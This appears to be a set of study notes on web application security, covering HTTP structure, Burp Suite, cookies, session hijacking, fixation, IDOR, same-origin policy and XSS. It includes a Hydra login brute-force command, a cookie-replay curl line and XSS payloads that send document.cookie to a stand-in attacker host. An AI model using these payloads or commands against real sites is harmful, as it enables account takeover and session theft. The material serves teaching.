
Web Security

The idea is to focus on the web applications themselves rather than the services that run them. Web application hacking requires an analysis of the implementation and functioning of the application. There are many tools that help us analyze a web application, like Google dorks, browser plugins, and so on.

Google Dorks

Search engines index anything; using advanced search queries, a lot of useful information can be found (see the Google Hacking Database). Google dorks can be used to find misconfigured web servers and applications. Search engines also help to find poorly coded web pages, like forms with hidden fields or coding mistakes.
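
For example, a classic dork like the following finds directory listings exposed by misconfigured web servers:

intitle:"index of" "parent directory"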

Web Crawling

It's used to get familiar with the target website. Offline inspection is preferred when looking for sensitive data in interesting places, like comments in dynamic pages, response headers, and cookies. It can be a long process; to download a website for later offline analysis, wget can be used.
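
For example, a site can be mirrored for later offline inspection with a command like the following (the URL is illustrative):

wget --mirror --convert-links --page-requisites http://www.example.com/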

Web Application assessment

First of all, we need to understand how a web application works and its components, like authentication, database interaction, and session management; input validation can also be a potential source of vulnerabilities. In general, web application assessment requires proper tools, like browser plugins: they can see and modify data in real time, allowing the editing of request headers and bodies and an in-depth inspection of responses. Checking each response header and body individually is useful to understand more of the application logic. Tool suites are proxies that interpose between a client and a server; the client can be any type of application, and they provide all the functionality of plugins and more (e.g. Burp Suite).

Common Web Application vulnerabilities

Typical vulnerabilities are weak login passwords, misconfigurations, session hijacking (which allows us to steal a session used by another user), XSS (which allows forcing a browser to execute a script), CSRF (which allows forcing a user to perform actions as an authenticated user), and finally SQL injection.

A page request can be schematized in the following way: the browser resolves the server's hostname via DNS, opens a TCP connection to the server, sends an HTTP request for a resource identified by a URL, and receives an HTTP response to render.

A URL has a structure which describes how a request is performed and which parameters are sent to the server. Some characters cannot be used freely in a URL because they have special meaning; the reserved characters are : / ? # [ ] @ ! $ & ' ( ) * + , ; = because their use is reserved. Also, only printable ASCII characters can be used. If it is really necessary to use a disallowed character, it has to be percent-encoded as a % followed by two hex digits.
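
For example, in JavaScript encodeURIComponent() applies this percent-encoding:

// '&' becomes %26, space becomes %20, '/' becomes %2F
encodeURIComponent("a&b c/d"); // "a%26b%20c%2Fd"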

Structure of HTTP request

An HTTP request is formed by three parts: a request line, a header, and a body. Header and body are divided by an empty line, and the request line and each header line are terminated by "\r\n".

Request Line

A request line is composed of three components: the method, the resource requested, and the version of HTTP used. For example:

GET /index.html HTTP/1.1

Some HTTP methods are: GET, POST, DELETE, OPTIONS, and PUT.

The header contains information about the request itself and the requester, like the Host (the hostname of the full URL accessed), Authorization information, the Referer (indicating from which page the request was made), and the User-Agent used to perform the request. There can also be meta-information about the request body, like its Content-Length and Content-Type.
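
Putting it together, a complete request might look like this (hostname and header values are illustrative):

GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Referer: http://www.example.com/home.html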

Structure of HTTP response

An HTTP response is similar in structure to an HTTP request: it is composed of a status line, an optional header, an empty line, and an optional body.

Status Line

The status line of an HTTP response is composed of three components: the version of the HTTP protocol used, a status code, and a textual reason phrase:

HTTP/1.1 200 OK

There are different classes of status codes: informational (100-199), successful (200-299), redirection (300-399), client error (400-499) and server error (500-599).

The first part of the header includes the banner of the web server, which can reveal loaded modules and the OS. The Location field can also be present, used to redirect the browser, together with the Content-Length and Content-Type of the body. Additional information that can be present includes Last-Modified, Expires, and Pragma.
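
For example, a response might start like this (server banner and values are illustrative):

HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html
Content-Length: 1234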

HTTP requests are used to provide dynamic content to websites: client-side scripting languages can be used to tell the browser what to execute according to user behaviour, while server-side scripting is used by the server to construct web pages with dynamic content.

Passing parameters using GET, encoded in the query string of the URL (page and parameter names below are illustrative):
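
GET /login.php?user=alice&pwd=secret HTTP/1.1
Host: www.example.com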

Passing parameters using POST, where the parameters travel in the request body:
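
POST /login.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

user=alice&pwd=secret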

HTTP Authentication

HTTP's built-in authentication mechanisms are not really used; two mechanisms are implemented: Basic, which sends the credentials base64-encoded (essentially in clear text), and Digest, which uses a hash-based challenge-response scheme.
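
For example, with Basic authentication the browser sends an Authorization header carrying base64("user:password"); here YWxpY2U6c2VjcmV0 is the encoding of the illustrative credentials alice:secret:

GET /private/ HTTP/1.1
Host: www.example.com
Authorization: Basic YWxpY2U6c2VjcmV0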

Monitoring and manipulating HTTP

The payload is inside a TCP packet and the data is in clear text, so a lot of tools can be used to sniff HTTP traffic; with HTTPS, tampering can be done using browser extensions (e.g. Tamper Data) or a proxy.

An HTTP proxy is a tool used to look at HTTP traffic and modify it, and it is application independent. Some HTTP proxies are WebScarab, ProxPy, and Burp.

Burp Suite

It is a set of tools that can be combined to perform automated or manual analysis of HTTP traffic, among which:

- Proxy, to intercept, inspect, and modify requests and responses on the fly;
- Repeater, to manually resend and tweak individual requests;
- Intruder, to automate sending many variations of a request (e.g. for fuzzing or brute-forcing);
- Decoder, to encode and decode data in common formats;
- Scanner (in the commercial edition), to automatically look for vulnerabilities.

Burp and Hydra can be used together to brute-force a login form:

hydra -L <users> -P <pwds> <target_ip> http-form-post '<page>:<POST data>:S=<success_condition>'
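
For example, against a hypothetical login page (wordlists, target, and success string are illustrative; ^USER^ and ^PASS^ are Hydra's placeholders for the candidate credentials):

hydra -L users.txt -P passwords.txt 10.0.0.5 http-post-form '/login.php:user=^USER^&pwd=^PASS^:S=Welcome'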

HTTP Security

HTTP is a stateless protocol, so to keep track of whether a user is authenticated and logged in, sessions have to be used. Normally sessions are implemented by the web application with cookies. Cookies are data created by the server, stored by the client, and transmitted with each request to identify a specific user. Cookies are defined in RFC 2109 and are composed of different fields: a name and a value, a Domain and Path that define the cookie's scope, an expiration (Expires/Max-Age), and flags such as Secure (send the cookie only over HTTPS) and HttpOnly (introduced in later specifications, making the cookie inaccessible to client-side scripts).
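
A server sets a cookie with a Set-Cookie response header, for example (name and value are illustrative):

Set-Cookie: sessionid=abc123; Domain=example.com; Path=/; Secure; HttpOnly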

Session cookies are used to identify session data stored on the server; for this reason the security of the cookie itself is critical: if someone steals the cookie, they can bypass the authentication scheme. For this reason cookies may have a short lifespan. XSS is a common technique used to steal session cookies.

Session hijacking

It is a type of attack that is no longer possible where HTTPS is used: it consisted of an attacker eavesdropping on a connection to steal the session cookie of a given user. The attacker then uses the stolen cookie to access the private information of that user. Sometimes websites force HTTPS only on the login page, but not on other sections of the web application, leaving the session cookie exposed.
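
Once a cookie has been sniffed, replaying it is trivial; for example with curl (cookie name, value, and URL are hypothetical):

curl --cookie "PHPSESSID=abc123" http://vulnerable.example/account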

Session Prediction

It was a technique used to guess the session ID that a web application would generate for a given user; the technique is explained in this video. It works by exploiting the implementation of cookie generation in some server-side programming languages (PHP in the video) and by using some information about the target.

Session Fixation

This kind of attack is a smart variation of session hijacking. The attacker performs a request to a web server to obtain a valid session ID, and then, via script injection, forces a target user to log in with that same session ID; once the victim authenticates, the attacker's known session ID identifies the victim's session and can be used to acquire further information.
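
A minimal sketch of the idea, assuming a PHP application that accepts session IDs from the URL (e.g. with session.use_trans_sid enabled); the link the victim is lured into using fixes the session ID chosen by the attacker:

http://vulnerable.example/login.php?PHPSESSID=attacker-chosen-id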

Insecure Direct Object Reference

It's not directly tied to cookies, but it is used to bypass authorization checks; it can happen when an application provides direct access to objects based on user-supplied input. The user can then directly access information not intended to be accessible.
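
For example, if account pages are addressed only by a numeric identifier taken from the request, changing the id parameter may expose another user's data (the URL is hypothetical):

http://vulnerable.example/account?id=1337 (the attacker's own account)
http://vulnerable.example/account?id=1338 (another user's account, if no authorization check is performed)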

Content Isolation

Modern browsers do not allow content coming from website A to modify content coming from website B. This prevents a malicious website from running scripts that access data and functionality of other websites. This check is done by following the same-origin policy (SOP).

The implications of the SOP are that two pages belong to the same origin only if protocol, host, and port are all equal, and that a script can access the DOM, cookies, and responses only of documents loaded from its own origin.

The problem with the SOP is that different subdomains cannot easily interact with each other. This problem can be solved in two different ways: scripts on both pages can set document.domain to their common parent domain, so that a script in app.stayerk.me can interact with example.stayerk.me; or by using the postMessage() function, which implements message-based communication between windows.
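
A minimal sketch of the postMessage() approach (origins and element id are illustrative): a page on app.stayerk.me sends a message to an embedded frame from example.stayerk.me, which verifies the sender's origin before trusting the data:

// On app.stayerk.me: send a message to the embedded frame
var frame = document.getElementById("other");
frame.contentWindow.postMessage("hello", "https://example.stayerk.me");

// On example.stayerk.me: verify the sender before using the data
window.addEventListener("message", function (event) {
  if (event.origin !== "https://app.stayerk.me") return; // ignore untrusted origins
  console.log("received: " + event.data);
});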

Client Side attack and Server Side attack

We can exploit the trust of the browser (XSS, CSRF) or of the server (SQL Injection, File Inclusion).

Client Side

The attacker can inject either HTML or JS, forcing a user to perform an action or stealing the session cookie. The target is the user's application (the browser), and the goal is to gain unauthorized information; the cause of this attack is the lack of input validation. XSS can be reflected, stored, or DOM-based. Possible goals of XSS attacks are capturing information about the victim and displaying additional or misleading information. The attacker can also force the user to perform actions on their behalf (in the spirit of CSRF).

Furthermore, additional hidden form fields can be injected to exploit the browser's autofill feature.
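
For example, fields like the following, invisible to the user, may be silently filled in by the browser and submitted together with the legitimate form (field names are illustrative):

<input name="email" style="display:none">
<input name="phone" style="display:none">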

Reflected XSS

In this kind of XSS attack, the attacker forces the user to click on a malicious link crafted to execute a script on a vulnerable website, reflecting the effects of the script execution onto the victim. The attacker can use obfuscation or encoding techniques to hide, as much as possible, the presence of the script inside the link.
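
For example, if a search page echoes the q parameter without sanitizing it, a link like the following (URL hypothetical, payload shown unencoded for readability) makes the victim's browser send its cookie to the attacker:

http://vulnerable.example/search?q=<script>document.location='http://attacker.example/steal?c='+document.cookie</script>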

Stored XSS

Some websites allow users to upload content that can later be seen by other users. If the input is not correctly validated, the attacker may upload malicious content that will be stored in the database and executed by any user that requests that particular content. In this setting the attacker does not have to force a user to click on a malicious link, and the scope of the attack is not restricted to a single target but includes virtually all the users of that particular web application.
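
For example, a comment containing the following payload (attacker URL hypothetical) would exfiltrate the session cookie of every user who views the page, by making the browser load an "image" from the attacker's server:

Nice post! <script>new Image().src='http://attacker.example/steal?c='+document.cookie;</script>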

For these reasons, stored XSS is more dangerous than reflected XSS.

Code and explanation of the MySpace worm by Samy Kamkar.